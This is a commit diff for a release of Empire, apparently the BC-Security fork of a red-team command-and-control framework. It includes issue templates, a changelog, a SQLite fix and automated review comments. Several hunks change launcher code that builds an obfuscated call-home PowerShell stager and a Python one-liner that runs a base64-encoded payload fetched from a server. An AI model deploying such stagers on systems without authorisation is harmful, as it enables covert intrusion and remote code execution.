New upstream version 3.1.2
Sophie Brun
4 years ago
0 | --- | |
1 | name: Bug report | |
2 | about: Create a report to help us improve | |
3 | title: "[BUG]" | |
4 | labels: bug | |
5 | assignees: '' | |
6 | ||
7 | --- | |
8 | ||
9 | **Empire Version** | |
10 | - Empire 3.x | |
11 | ||
12 | **OS Information (Linux flavor, Python version)** | |
13 | - OS: | |
14 | - Python: | |
15 | ||
16 | **Describe the bug** | |
17 | A clear and concise description of what the bug is. | |
18 | ||
19 | **To Reproduce** | |
20 | Steps to reproduce the behavior: | |
21 | 1. Go to '...' | |
22 | 2. Click on '....' | |
23 | 3. Scroll down to '....' | |
24 | 4. See error | |
25 | ||
26 | **Expected behavior** | |
27 | A clear and concise description of what you expected to happen. | |
28 | ||
29 | **Screenshots** | |
30 | If applicable, add screenshots to help explain your problem. | |
31 | ||
32 | **Additional context** | |
33 | Add any other context about the problem here. |
0 | --- | |
1 | name: Feature request | |
2 | about: Suggest an idea for this project | |
3 | title: "[FEATURE REQUEST]" | |
4 | labels: enhancement | |
5 | assignees: '' | |
6 | ||
7 | --- | |
8 | ||
9 | **Is your feature request related to a problem? Please describe.** | |
10 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] | |
11 | ||
12 | **Describe the solution you'd like** | |
13 | A clear and concise description of what you want to happen. | |
14 | ||
15 | **Describe alternatives you've considered** | |
16 | A clear and concise description of any alternative solutions or features you've considered. | |
17 | ||
18 | **Additional context** | |
19 | Add any other context or screenshots about the feature request here. |
0 | # Comment that will be sent if an issue is judged to be closed | |
1 | comment: "This issue is closed because it does not meet our issue template. Please resubmit with the correct template." | |
2 | issueConfigs: | |
3 | # There can be several configs for different kind of issues. | |
4 | - content: | |
5 | # Example 1: bug report | |
6 | - "Empire Version" | |
7 | - "OS Information (Linux flavor, Python version)" | |
8 | - "Describe the bug" | |
9 | - "To Reproduce" | |
10 | - "Expected behavior" | |
11 | - "Screenshots" | |
12 | - "Additional context" | |
13 | ||
14 | - content: | |
15 | # Example 2: feature request | |
16 | - "Is your feature request related to a problem? Please describe." | |
17 | - "Describe the solution you'd like" | |
18 | - "Describe alternatives you've considered" | |
19 | - "Additional context" | |
20 | ||
21 | - content: | |
22 | # Example 3: fall back | |
23 | - "Empire Version" | |
24 | - "OS Information (Linux flavor, Python version)" | |
25 | - "Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better." | |
26 | - "Screenshot of error, embedded text output, or Pastebin link to the error" | |
27 | - "Any additional information" |
0 | 3/13/2020 | |
1 | ------------ | |
2 | - Version 3.1.2 Master Release | |
3 | - Fixed REST login error 500 on some version of SQLite - #120 (@justsly) | |
4 | - Fixed generate launcher bug for redirector listener - #125 (@RedBulletTooling) | |
5 | ||
0 | 6 | 3/8/2020 |
7 | ------------ | |
1 | 8 | - Version 3.1.1 Master Release |
2 | 9 | - Updated the /me endpoint that was added in 3.1.0 to return the full user object (@Vinnybod) |
3 | 10 | - Updated install script for Kali Powershell install - #118 (@Vinnybod) |
14 | 14 | from builtins import str |
15 | 15 | from builtins import range |
16 | 16 | |
17 | VERSION = "3.1.1 BC-Security Fork" | |
17 | VERSION = "3.1.2 BC-Security Fork" | |
18 | 18 | |
19 | 19 | from pydispatch import dispatcher |
20 | 20 |
107 | 107 | try: |
108 | 108 | self.lock.acquire() |
109 | 109 | cur = conn.cursor() |
110 | user = cur.execute("SELECT password from users WHERE username = ? AND enabled = true LIMIT 1", (user_name,)).fetchone() | |
110 | user = cur.execute("SELECT password from users WHERE username = ? AND enabled = 1 LIMIT 1", (user_name,)).fetchone() | |
111 | 111 | |
112 | 112 | if user == None: |
113 | 113 | return None |
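Review bot: The new literal `enabled = 1` carries no explanation, so a later cleanup could easily restore `true`; a comment above the query such as `# SQLite < 3.23.0 has no TRUE/FALSE keywords, so compare against integer 1` would record why it is written this way. `self.lock.acquire()` sits inside the `try:`; if the matching release is in a `finally` outside this hunk, a failure before the lock is taken would release a lock that was never held, so acquiring before the `try:` (or using `with self.lock:`) is safer. `if user == None:` would read better as `if user is None:`. The enclosing function starts and ends outside the hunk.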
194 | 194 | |
195 | 195 | # prebuild the request routing packet for the launcher |
196 | 196 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') |
197 | b64RoutingPacket = base64.b64encode(routingPacket) | |
197 | b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8") | |
198 | 198 | |
199 | 199 | #stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" |
200 | stager += "$ser='%s';$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName) | |
200 | stager += "$ser=%s;$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName) | |
201 | 201 | |
202 | 202 | #Add custom headers if any |
203 | 203 | if customHeaders != []: |
263 | 263 | |
264 | 264 | # prebuild the request routing packet for the launcher |
265 | 265 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') |
266 | b64RoutingPacket = base64.b64encode(routingPacket) | |
266 | b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8") | |
267 | 267 | |
268 | 268 | launcherBase += "req=urllib2.Request(server+t);\n" |
269 | 269 | # add the RC4 packet to a cookie |
324 | 324 | launcherBase += "exec(''.join(out))" |
325 | 325 | |
326 | 326 | if encode: |
327 | launchEncoded = base64.b64encode(launcherBase) | |
327 | launchEncoded = base64.b64encode(launcherBase).decode("utf-8") | |
328 | 328 | launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) |
329 | 329 | return launcher |
330 | 330 | else: |
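Review bot: On Python 3, `base64.b64encode(launcherBase)` at line 327 raises TypeError if `launcherBase` is still a `str`, which the `launcherBase += "..."` context lines suggest; the added `.decode("utf-8")` only converts the result and would never be reached. Encoding the input first would fix it: `launchEncoded = base64.b64encode(launcherBase.encode("utf-8")).decode("utf-8")`. The two `b64RoutingPacket` changes at lines 197 and 266 are correct only if `packets.build_routing_packet` returns bytes, which is not visible here. The enclosing function begins outside the hunk, so the initial type of `launcherBase` should be confirmed there.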